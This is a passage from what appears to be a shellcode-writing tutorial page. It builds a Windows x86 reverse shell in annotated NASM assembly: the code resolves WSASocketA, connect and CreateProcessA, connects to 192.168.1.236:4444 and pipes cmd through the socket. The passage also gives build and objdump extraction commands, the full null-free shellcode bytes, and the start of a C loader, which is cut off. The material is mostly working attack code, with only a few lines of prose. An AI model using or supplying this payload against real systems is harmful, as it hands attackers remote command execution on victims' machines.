<span class="c1">; ECX 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDX 00001725</span>
<span class="c1">; EBX 76660000 kernel32.76660000</span>
<span class="c1">; ESP 0022FDCC ASCII "WSASocketA"</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 004010C4 reverse_.004010C4</span>
<span class="nl">callWSASocketA:</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; clear edx</span>
<span class="nf">push</span> <span class="nb">edx</span><span class="c1">; ; dwFlags=NULL</span>
<span class="nf">push</span> <span class="nb">edx</span><span class="c1">; ; g=NULL</span>
<span class="nf">push</span> <span class="nb">edx</span><span class="c1">; ; lpProtocolInfo=NULL</span>
<span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="mh">0x6</span> <span class="c1">; protocol=6</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">sub</span> <span class="nb">dl</span><span class="p">,</span> <span class="mh">0x5</span> <span class="c1">; edx==1</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; type=1</span>
<span class="nf">inc</span> <span class="nb">edx</span> <span class="c1">; af=2</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">call</span> <span class="nb">eax</span> <span class="c1">; call WSASocketA</span>
<span class="nf">push</span> <span class="nb">eax</span> <span class="c1">; save eax in edx</span>
<span class="nf">pop</span> <span class="nb">edi</span> <span class="c1">; </span>
<span class="c1">; EAX 00000054</span>
<span class="c1">; ECX 73FB685E</span>
<span class="c1">; EDX 00000016</span>
<span class="c1">; EBX 76660000 kernel32.76660000</span>
<span class="c1">; ESP 0022FDCC ASCII "WSASocketA"</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDI 00000054</span>
<span class="c1">; EIP 004010D6 reverse_.004010D6</span>
<span class="nl">getConnect:</span>
<span class="nf">push</span> <span class="mh">0x61746365</span> <span class="c1">; atce</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3</span><span class="p">],</span> <span class="mh">0x61</span> <span class="c1">; atce - a = tce</span>
<span class="nf">push</span> <span class="mh">0x6e6e6f63</span> <span class="c1">; nnoc</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; pointer to the string</span>
<span class="nf">push</span> <span class="nb">esi</span> <span class="c1">; socket handler</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; GetProcAddress(ws2_32.dll, connect)</span>
<span class="c1">; EAX 767448BE ws2_32.connect</span>
<span class="c1">; ECX 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDX 00001725</span>
<span class="c1">; EBX 76660000 kernel32.76660000</span>
<span class="c1">; ESP 0022FDC4 ASCII "connect"</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDI 00000054</span>
<span class="c1">; EIP 004010EA reverse_.004010EA</span>
<span class="nl">callConnect:</span>
<span class="c1">;set up sockaddr_in</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="mh">0xec02a9c1</span> <span class="c1">;the IP plus 0x01010101 so we avoid NULLs (IP=192.168.1.236)</span>
<span class="nf">sub</span> <span class="nb">edx</span><span class="p">,</span> <span class="mh">0x01010101</span> <span class="c1">;subtract from edx to obtain the real IP</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">;push sin_addr</span>
<span class="nf">push</span> <span class="kt">word</span> <span class="mh">0x5c11</span> <span class="c1">;0x115c = (port 4444)</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span>
<span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">2</span>
<span class="nf">push</span> <span class="nb">dx</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="kt">byte</span> <span class="mh">0x10</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edi</span>
<span class="nf">call</span> <span class="nb">eax</span>
<span class="c1">; EAX 00000000</span>
<span class="c1">; ECX 00347010</span>
<span class="c1">; EDX 77DB64F4 ntdll.KiFastSystemCallRet</span>
<span class="c1">; EBX 76660000 kernel32.76660000</span>
<span class="c1">; ESP 0022FDBC</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDI 00000054</span>
<span class="c1">; EIP 00401108 reverse_.00401108</span>
<span class="nl">getCreateProcessA:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing ECX</span>
<span class="nf">push</span> <span class="mh">0x61614173</span> <span class="c1">; aaAs</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x2</span><span class="p">],</span> <span class="mh">0x6161</span> <span class="c1">; aaAs - aa</span>
<span class="nf">push</span> <span class="mh">0x7365636f</span> <span class="c1">; ecor</span>
<span class="nf">push</span> <span class="mh">0x72506574</span> <span class="c1">; rPet</span>
<span class="nf">push</span> <span class="mh">0x61657243</span> <span class="c1">; aerC</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; push the pointer to stack</span>
<span class="nf">push</span> <span class="nb">ebx</span> <span class="c1">; kernel32 handler</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; GetProcAddress(kernel32.dll, CreateProcessA)</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; save kernel32.dll handler for future purposes</span>
<span class="c1">; EAX 76662062 kernel32.CreateProcessA</span>
<span class="c1">; ECX 76660000 kernel32.76660000</span>
<span class="c1">; EDX 76660000 kernel32.76660000</span>
<span class="c1">; EBX 76660000 kernel32.76660000</span>
<span class="c1">; ESP 0022FDAC ASCII "CreateProcessA"</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76660000 kernel32.76660000</span>
<span class="c1">; EDI 00000054</span>
<span class="c1">; EIP 00401129 reverse_.00401129</span>
<span class="nl">shell:</span>
<span class="nf">push</span> <span class="mh">0x61646d63</span> <span class="c1">; push admc</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3</span><span class="p">],</span> <span class="mh">0x61</span> <span class="c1">; sub a to admc = dmc</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">esp</span> <span class="c1">; save a pointer to the command line</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; our socket becomes the shells hStdError</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; our socket becomes the shells hStdOutput</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; our socket becomes the shells hStdInput</span>
<span class="nf">xor</span> <span class="nb">edi</span><span class="p">,</span> <span class="nb">edi</span> <span class="c1">; Clear edi for all the NULL's we need to push</span>
<span class="nf">push</span> <span class="kt">byte</span> <span class="mh">0x12</span> <span class="c1">; We want to place (18 * 4) = 72 null bytes onto the stack</span>
<span class="nf">pop</span> <span class="nb">ecx</span> <span class="c1">; Set ECX for the loop</span>
<span class="nl">push_loop:</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; push a null dword</span>
<span class="nf">loop</span> <span class="nv">push_loop</span> <span class="c1">; keep looping untill we have pushed enough nulls</span>
<span class="nf">mov</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3C</span><span class="p">],</span> <span class="mh">0x0101</span> <span class="c1">; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW</span>
<span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">],</span> <span class="mh">0x44</span>
<span class="nf">lea</span> <span class="nb">ecx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">]</span> <span class="c1">; Set EAX as a pointer to our STARTUPINFO Structure</span>
<span class="c1">;perform the call to CreateProcessA</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; Push the pointer to the PROCESS_INFORMATION Structure </span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; Push the pointer to the STARTUPINFO Structure</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; The lpEnvironment is NULL so the new process will have the same enviroment as its parent</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; We dont specify any dwCreationFlags </span>
<span class="nf">inc</span> <span class="nb">edi</span> <span class="c1">; Increment edi to be one</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent</span>
<span class="nf">dec</span> <span class="nb">edi</span> <span class="c1">; Decrement edi back down to zero</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; Set lpThreadAttributes to NULL</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; Set lpProcessAttributes to NULL</span>
<span class="nf">push</span> <span class="nb">ebx</span> <span class="c1">; Set the lpCommandLine to point to "cmd",0</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; Set lpApplicationName to NULL as we are using the command line param instead</span>
<span class="nf">call</span> <span class="nb">eax</span>
<span class="c1">; EAX 00000001</span>
<span class="c1">; ECX 766BF6B0 kernel32.766BF6B0</span>
<span class="c1">; EDX 002E0174</span>
<span class="c1">; EBX 0022FDA8 ASCII "cmd"</span>
<span class="c1">; ESP 0022FD54</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76660000 kernel32.76660000</span>
<span class="c1">; EDI 00000054</span>
<span class="c1">; EIP 0040115F reverse_.0040115F</span>
<span class="nl">getExitProcess:</span>
<span class="nf">add</span> <span class="nb">esp</span><span class="p">,</span> <span class="mh">0x010</span> <span class="c1">; clean the stack</span>
<span class="nf">push</span> <span class="mh">0x61737365</span> <span class="c1">; asse</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3</span><span class="p">],</span> <span class="mh">0x61</span> <span class="c1">; asse -a </span>
<span class="nf">push</span> <span class="mh">0x636F7250</span> <span class="c1">; corP</span>
<span class="nf">push</span> <span class="mh">0x74697845</span> <span class="c1">; tixE</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">esi</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; GetProcAddress(kernel32.dll, ExitProcess)</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">ecx</span>
<span class="nf">call</span> <span class="nb">eax</span>
</code></pre></div></div>
<p>Compile it and test it</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@root:# nasm <span class="nt">-f</span> elf32 reverse_shell_shellcode.nasm <span class="p">;</span> ld <span class="nt">-melf_i386</span> <span class="nt">-o</span> reverse_shell_shellcode reverse_shell_shellcode.o
root@root:# objdump <span class="nt">-d</span> ./reverse_shell_shellcode|grep <span class="s1">'[0-9a-f]:'</span>|grep <span class="nt">-v</span> <span class="s1">'file'</span>|cut <span class="nt">-f2</span> <span class="nt">-d</span>:|cut <span class="nt">-f1-7</span> <span class="nt">-d</span><span class="s1">' '</span>|tr <span class="nt">-s</span> <span class="s1">' '</span>|tr <span class="s1">'\t'</span> <span class="s1">' '</span>|sed <span class="s1">'s/ $//g'</span>|sed <span class="s1">'s/ /\\x/g'</span>|paste <span class="nt">-d</span> <span class="s1">''</span> <span class="nt">-s</span> |sed <span class="s1">'s/^/"/'</span>|sed <span class="s1">'s/$/"/g'</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">30</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">40</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">14</span><span class="se">\x</span><span class="s2">ad"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">96</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">58</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">3c</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">da"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">d8</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">38</span><span class="se">\x</span><span class="s2">47</span><span class="se">\x</span><span class="s2">65"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">78"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">08</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">0c"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">4e</span><span class="se">\x</span><span class="s2">49</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">1c</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">14</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">31"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">4c</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">4c</span><span class="se">\x</span><span class="s2">6f"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">33</span><span class="se">\x</span><span class="s2">32</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">77</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">32</span><span class="se">\x</span><span class="s2">5f</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">c6</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">75"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">74"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">56</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">ba</span><span class="se">\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">01"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">29</span><span class="se">\x</span><span class="s2">d4</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">6b</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">56"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">b2</span><span class="se">\x</span><span class="s2">06</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">ea</span><span class="se">\x</span><span class="s2">05</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">42"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">5f</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">03"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">56</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">ba</span><span class="se">\x</span><span class="s2">c1</span><span class="se">\x</span><span class="s2">a9</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">ed"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">ea</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">11</span><span class="se">\x</span><span class="s2">5c</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">b2</span><span class="se">\x</span><span class="s2">02"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">41"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">68"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">43</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">de"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">6d</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">57"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">59</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">fd</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">c7</span><span class="se">\x</span><span class="s2">44</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">3c</span><span class="se">\x</span><span class="s2">01"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">c6</span><span class="se">\x</span><span class="s2">44</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">44</span><span class="se">\x</span><span class="s2">8d</span><span class="se">\x</span><span class="s2">4c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">57"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">47</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">4f</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">c4</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">73"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">45"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">56</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0"</span>
</code></pre></div></div>
<p>The shellcode.c file</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
#include <windows.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">shellcode</span> <span class="o">=</span> \
<span class="s">"</span><span class="se">\x31\xc9\xf7\xe1\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78</span><span class="s">"</span>
